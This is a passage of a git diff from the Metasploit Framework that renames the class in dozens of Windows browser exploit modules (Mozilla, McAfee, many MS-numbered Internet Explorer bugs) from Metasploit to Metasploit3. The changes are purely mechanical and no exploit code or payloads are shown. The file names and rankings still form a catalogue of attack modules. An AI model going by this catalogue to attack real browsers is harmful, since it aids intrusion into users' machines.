f3ada0ce19..d3a8fb15d1 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index 6222cb62ad..dc41c99c65 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/malwarebytes_update_exec.rb b/modules/exploits/windows/browser/malwarebytes_update_exec.rb index 3f266e2401..db740e9bdd 100644 --- a/modules/exploits/windows/browser/malwarebytes_update_exec.rb +++ b/modules/exploits/windows/browser/malwarebytes_update_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # Would be Great except MBAE doesn't version check include Msf::Exploit::EXE diff --git a/modules/exploits/windows/browser/maxthon_history_xcs.rb b/modules/exploits/windows/browser/maxthon_history_xcs.rb index 50d1a2d22a..89d894554c 100644 --- a/modules/exploits/windows/browser/maxthon_history_xcs.rb +++ b/modules/exploits/windows/browser/maxthon_history_xcs.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index 53c6290d88..ff4cf01a15 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb index 698d652293..2d39cac1ad 100644 --- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb +++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index 6ec8e51456..525a9b842d 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index 9271876537..e5ab64c876 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb index e54e51802a..7cba8400bc 100644 --- a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb +++ b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb index cab1fc1a8e..06ef17e639 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb index 08b099d723..ac509c6e3d 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index 745da69d96..509d30f471 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 164371272f..6f5fcddffe 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb index cff6c3f7a0..287360a20a 100644 --- a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb +++ b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb index 5be7e16f69..496bbf0123 100644 --- a/modules/exploits/windows/browser/mozilla_nstreerange.rb +++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index db018c2cb8..7f378c62e7 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 69aa07f0c1..068a4c1a46 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms05_054_onload.rb b/modules/exploits/windows/browser/ms05_054_onload.rb index eef5da5354..300685a93e 100644 --- a/modules/exploits/windows/browser/ms05_054_onload.rb +++ b/modules/exploits/windows/browser/ms05_054_onload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index 9555ec286d..65f8e87a6b 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index 93ecd04c90..8a7966917d 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index 1d7eb8c07d..bf5f1f7495 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb index 26f573d5ec..16b12abc37 100644 --- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb +++ b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms06_067_keyframe.rb b/modules/exploits/windows/browser/ms06_067_keyframe.rb index d7f88606fb..775de5a215 100644 --- a/modules/exploits/windows/browser/ms06_067_keyframe.rb +++ b/modules/exploits/windows/browser/ms06_067_keyframe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index 14dcc77255..98c92b6610 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index 1628db962c..ebe1eb2403 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index 725c81f30c..b53071abb3 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb index 251befb3e1..fc5f2e8ab7 100644 --- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb +++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index 0359bc1b2f..8834323960 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index 9283bb4018..9d941bb40b 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb index 1164707cec..3f2dc970a4 100644 --- a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb +++ b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb index ace46aaf40..4c883ed1f3 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index 40b2f28198..548fc18a29 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms09_072_style_object.rb b/modules/exploits/windows/browser/ms09_072_style_object.rb index 30271f461c..e31cd4d028 100644 --- a/modules/exploits/windows/browser/ms09_072_style_object.rb +++ b/modules/exploits/windows/browser/ms09_072_style_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_002_aurora.rb b/modules/exploits/windows/browser/ms10_002_aurora.rb index 2120823523..bb682e0e02 100644 --- a/modules/exploits/windows/browser/ms10_002_aurora.rb +++ b/modules/exploits/windows/browser/ms10_002_aurora.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb index 84a26a074b..5ba8df594e 100644 --- a/modules/exploits/windows/browser/ms10_002_ie_object.rb +++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index ee2b075105..38abad66ba 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb index 3ec9b12463..ef07915e4a 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index 355936fc15..497cd2818f 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index eba424badf..f6283f3c4d 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb index 8728fdf140..3b272637f1 100644 --- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb +++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb index c1b3c90b4a..76165d8a84 100644 --- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index a98ae11881..74898d9b7d 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index 0d17c7c088..cbb1e33a3e 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # Need more love for Great include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb index 56614e3304..037424e5c5 100644 --- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb +++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_081_option.rb b/modules/exploits/windows/browser/ms11_081_option.rb index aaecf56285..51c62c2f9b 100644 --- a/modules/exploits/windows/browser/ms11_081_option.rb +++ b/modules/exploits/windows/browser/ms11_081_option.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb index 7ae5379d65..ce333b7c93 100644 --- a/modules/exploits/windows/browser/ms11_093_ole32.rb +++ b/modules/exploits/windows/browser/ms11_093_ole32.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb index 774d2f2832..22dcfc7b6a 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb index f994dd2c6e..de2192eb00 100644 --- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb +++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb index e1347a0cc1..6d6b762169 100644 --- a/modules/exploits/windows/browser/ms12_037_same_id.rb +++ b/modules/exploits/windows/browser/ms12_037_same_id.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb index 311c510e5c..a0302f48dc 100644 --- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb +++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb index afba08bfa9..cb409f5da7 100644 --- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb +++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb index 7cb2df0828..72a855ab3c 100644 --- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb +++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_055_canchor.rb b/modules/exploits/windows/browser/ms13_055_canchor.rb index 4c11b6e440..bbed4c4ee0 100644 --- a/modules/exploits/windows/browser/ms13_055_canchor.rb +++ b/modules/exploits/windows/browser/ms13_055_canchor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb index 307c1aa501..80881a1894 100644 --- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb +++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms13_069_caret.rb b/modules/exploits/windows/browser/ms13_069_caret.rb index bff2c59fb7..aaf14954b6 100644 --- a/modules/exploits/windows/browser/ms13_069_caret.rb +++ b/modules/exploits/windows/browser/ms13_069_caret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb index b83c815b82..dd3327be64 100644 --- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb +++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb index b1cd120d90..99aa91da65 100644 --- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb +++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb index b61936d5ca..8129288d3f 100644 --- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb +++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ms14_012_textrange.rb b/modules/exploits/windows/browser/ms14_012_textrange.rb index 65029c6b63..b28f0dc273 100644 --- a/modules/exploits/windows/browser/ms14_012_textrange.rb +++ b/modules/exploits/windows/browser/ms14_012_textrange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb b/modules/exploits/windows/browser/msvidctl_mpeg2.rb index e323087a47..70582071df 100644 --- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb +++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mswhale_checkforupdates.rb b/modules/exploits/windows/browser/mswhale_checkforupdates.rb index 622b98b22d..6acfe799f4 100644 --- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb +++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include 